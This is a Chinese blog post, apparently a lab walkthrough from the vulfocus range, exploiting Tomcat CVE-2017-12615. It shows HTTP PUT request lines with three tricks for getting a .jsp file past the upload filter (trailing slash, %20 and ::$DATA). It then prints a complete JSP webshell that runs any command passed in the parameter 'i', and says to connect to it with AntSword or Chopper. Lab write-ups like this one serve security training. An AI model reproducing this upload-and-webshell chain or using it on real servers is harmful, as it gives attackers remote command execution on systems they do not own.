vulfocus——Tomcat任意写入文件漏洞(CVE-2017-12615)

痛定思痛。 2022-11-25 13:23 114阅读 0赞

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70][]

打开靶场如图

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1][]

根据提示，可以使用PUT方法上传任意文件，于是抓包

![20200809180428574.png][]

将其传给Repeater

将头修改为PUT，并上传jsp文件，注意上传的时候一般jsp都是不被允许上传的，所以我们需要绕过，主要有三种方法

**注意！！！！PUT后面要有空格！！！！否则行不通！！！！**

法一：

使用斜杠/，斜杠在文件名中是非法的，所以会被去除（Linux和Windows）

PUT /x.jsp/ HTTP/1.1

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2][]

法二：

使用空格%20，在Windows下不允许文件以空格结尾，因此上传到windows会被自动去掉末尾空格

PUT /x.jsp%20 HTTP/1.1

法三：

使用NTFS流，也是在Windows中适用的

PUT /x.jsp::$DATA HTTP/1.1

然后来看看文件是否上传成功了

![20200809180525449.png][]

成功！！

那么接下来就可以上传更花哨的马了

上传jsp木马后门

<%
    
            java.io.InputStream in =
    
        Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    
            int a = -1;
    
            byte[] b = new byte[2048];
    
            out.print("<pre>");
    
            while((a=in.read(b))!=-1){
    
                out.println(new String(b));
    
            }
    
            out.print("</pre>");
    
    %>

上传之后就可以用那些连接了

这里扩展，查看请求头的命令为OPTIONS

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3][]

通过命令i=ls可以查看自己的马是否上传成功了

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4][]

话题回来，上传完大马之后在蚁剑或者菜刀上GetShell

像这样

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5][]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70]: /images/20221124/acb85f3c410948a989b8461ffaa2f5f2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1]: /images/20221124/1182f38ecfef4f98b877ab31a37945c1.png
[20200809180428574.png]: /images/20221124/27c335e387314e3699a28989474b0f84.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2]: /images/20221124/a79d043de88a49f28f1c7ffee703ab95.png
[20200809180525449.png]: /images/20221124/639f0d10df1f4a39b4acedb2ee6046be.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3]: /images/20221124/0dec8f967766403fbd437d7b1ac95672.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4]: /images/20221124/3663c96632e342dd982a2584350b1db5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5]: /images/20221124/d090bcc0e5a2427ca23021698dd12497.png